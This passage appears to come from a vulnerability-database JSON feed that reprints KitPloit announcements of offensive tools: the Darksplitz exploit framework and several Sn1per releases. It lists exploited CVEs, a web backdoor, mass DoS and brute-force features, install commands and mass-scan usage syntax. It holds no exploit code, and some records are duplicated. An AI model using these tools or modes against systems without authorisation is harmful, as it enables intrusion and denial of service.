Ubuntu or Kali linux. \n\n\n 1. ` $ git clone https://github.com/koboi137/darksplitz `\n 2. ` $ cd darksplitz/ `\n 3. ` $ sudo ./install.sh `\n \n** Features ** \n\n\n * Extract [ mikrotik ](<https://www.kitploit.com/search/label/MikroTik> \"mikrotik\" ) credential (user.dat) \n * Password generator \n * Reverse IP lookup \n * Mac address sniffer \n * Online md5 cracker \n * Mac address lookup \n * Collecting url from web.archive.org \n * Web [ backdoor ](<https://www.kitploit.com/search/label/Backdoor> \"backdoor\" ) (Dark Shell) \n * Winbox exploit (CVE-2018-14847) \n * ChimeyRed exploit for mipsbe (Mikrotik) \n * Exploit web application \n * Mass apple dos (CVE-2018-4407) \n * Libssh exploit (CVE-2018-10933) \n * Discovering Mikrotik device \n * Directory scanner \n * Subdomain scanner \n * Mac address scanner \n * Mac address pinger \n * Vhost [ scanner ](<https://www.kitploit.com/search/label/Scanner> \"scanner\" ) (bypass cloudflare) \n * Mass [ bruteforce ](<https://www.kitploit.com/search/label/Bruteforce> \"bruteforce\" ) (wordpress) \n * Interactive msfrpc client \n \n** Exploit web application ** \n\n\n * plUpload file upload \n * jQuery file upload (CVE-2018-9206) \n * Laravel (.env) \n * sftp-config.json (misc) \n * Wordpress register (enable) \n * elfinder file upload \n * Drupal 7 exploit (CVE-2018-7600) \n * Drupal 8 exploit (CVE-2018-7600) \n * com_fabrik exploit (joomla) \n * gravityform plugin file upload (wordpress) \n * geoplace3 plugin file upload (wordpress) \n * peugeot-music plugin file upload (wordpress) \n \n** Notes ** \nThis tool will work fine under root, because scapy module and other need root user to access more features. But you can run as user too in some features. ;) \n \n \n\n\n** [ Download Darksplitz ](<https://github.com/koboi137/darksplitz> \"Download Darksplitz\" ) **\n", "modified": "2019-04-04T21:12:09", "published": "2019-04-04T21:12:09", "id": "KITPLOIT:5494076556436489947", "href": "http://www.kitploit.com/2019/04/darksplitz-exploit-framework.html", "title": "Darksplitz - Exploit Framework", "type": "kitploit", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T16:36:58", "bulletinFamily": "tools", "description": "[  ](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. \n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n** Categorized host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Personalized notes field for each host ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n** DEMO VIDEO: ** \n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.) \n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** AUTO-PWN: ** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600 \n * GPON Router RCE CVE-2018-10561 \n * [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638 \n * Apache Struts 2 RCE CVE-2017-9805 \n * Apache Jakarta RCE CVE-2017-5638 \n * Shellshock GNU Bash RCE CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * Default Apache Tomcat Creds CVE-2009-3843 \n * MS Windows SMB RCE MS08-067 \n * Webmin File Disclosure CVE-2006-3392 \n * [ Anonymous FTP ](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access \n * PHPMyAdmin Backdoor RCE \n * PHPMyAdmin Auth Bypass \n * JBoss Java De-Serialization RCE's \n \n** KALI LINUX INSTALL: ** \n\n \n \n ./install.sh\n\n \n** DOCKER INSTALL: ** \nCredits: @menzow \nDocker Install: [ https://github.com/menzow/sn1per-docker ](<https://github.com/menzow/sn1per-docker>) \nDocker Build: [ https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/ ](<https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/>) \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** UPDATE: ** Checks for updates and upgrades all components used by sniper. \n * ** REIMPORT: ** Reimport all workspace files into Metasploit and reproduce all reports. \n * ** RELOAD: ** Reload the master workspace report. \n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc>) \n \n \n\n\n** [ Download Sn1per v5.0 ](<https://github.com/1N3/Sn1per>) **\n", "modified": "2018-07-05T13:45:01", "published": "2018-07-05T13:45:01", "id": "KITPLOIT:7835941952769002973", "href": "http://www.kitploit.com/2018/07/sn1per-v50-automated-pentest-recon.html", "title": "Sn1per v5.0 - Automated Pentest Recon Scanner", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-18T12:34:00", "bulletinFamily": "tools", "description": "[  ](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. \n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n** Categorized host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Personalized notes field for each host ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n** DEMO VIDEO: ** \n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.) \n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** AUTO-PWN: ** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600 \n * GPON Router RCE CVE-2018-10561 \n * [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638 \n * Apache Struts 2 RCE CVE-2017-9805 \n * Apache Jakarta RCE CVE-2017-5638 \n * Shellshock GNU Bash RCE CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * Default Apache Tomcat Creds CVE-2009-3843 \n * MS Windows SMB RCE MS08-067 \n * Webmin File Disclosure CVE-2006-3392 \n * [ Anonymous FTP ](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access \n * PHPMyAdmin Backdoor RCE \n * PHPMyAdmin Auth Bypass \n * JBoss Java De-Serialization RCE's \n \n** KALI LINUX INSTALL: ** \n\n \n \n ./install.sh\n\n \n** DOCKER INSTALL: ** \nCredits: @menzow \nDocker Install: [ https://github.com/menzow/sn1per-docker ](<https://github.com/menzow/sn1per-docker>) \nDocker Build: [ https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/ ](<https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/>) \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** UPDATE: ** Checks for updates and upgrades all components used by sniper. \n * ** REIMPORT: ** Reimport all workspace files into Metasploit and reproduce all reports. \n * ** RELOAD: ** Reload the master workspace report. \n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc>) \n \n \n\n\n** [ Download Sn1per v5.0 ](<https://github.com/1N3/Sn1per>) **\n", "modified": "2018-11-24T12:43:00", "published": "2018-11-24T12:43:00", "id": "KITPLOIT:8672599587089685905", "href": "http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-18T14:35:32", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner> \"automated scanner\" ) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [ https://xerosecurity.com ](<https://xerosecurity.com/> \"https://xerosecurity.com\" ) . \n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n** Detailed host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n** NMap HTML host reports ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n** Takeovers and Email Security ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n** HTML5 Notepad ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n** ORDER SN1PER PROFESSIONAL: ** \nTo obtain a Sn1per Professional license, go to [ https://xerosecurity.com ](<https://xerosecurity.com/> \"https://xerosecurity.com\" ) . \n \n** DEMO VIDEO: ** \n \n \n\n\n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * Automatically collects basic recon (ie. whois, ping, DNS, etc.) \n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** EXPLOITS: ** \n\n\n * Drupal RESTful Web Services unserialize() SA-CORE-2019-003 \n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts \n * Drupal: CVE-2018-7600: [ Remote Code Execution ](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- SA-CORE-2018-002 \n * GPON Routers - Authentication Bypass / [ Command Injection ](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561 \n * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption \n * Apache Tomcat: Remote Code Execution (CVE-2017-12617) \n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271 \n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) \n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805) \n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) \n * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269 \n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249 \n * Shellshock Bash Shell remote code execution CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) \n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843 \n * MS08-067 Microsoft Server Service Relative Path Stack Corruption \n * Webmin File Disclosure CVE-2006-3392 \n * VsFTPd 2.3.4 Backdoor \n * ProFTPd 1.3.3C Backdoor \n * MS03-026 Microsoft RPC DCOM Interface Overflow \n * DistCC Daemon Command Execution \n * JBoss Java De-Serialization \n * HTTP Writable Path PUT/DELETE File Access \n * Apache Tomcat User Enumeration \n * Tomcat Application Manager Login Bruteforce \n * Jenkins-CI Enumeration \n * HTTP WebDAV Scanner \n * Android Insecure ADB \n * Anonymous FTP Access \n * PHPMyAdmin Backdoor \n * PHPMyAdmin Auth Bypass \n * OpenSSH User Enumeration \n * LibSSH Auth Bypass \n * SMTP User Enumeration \n * Public NFS Mounts \n \n** KALI LINUX INSTALL: ** \n\n \n \n bash install.sh\n\n \n** UBUNTU/DEBIAN/PARROT INSTALL: ** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n** DOCKER INSTALL: ** \n\n \n \n docker build Dockerfile\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TA RGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] WEBSCAN MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w <WORKSPACE_ALIAS& gt; --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS'\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** FLYOVER: ** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly). \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper 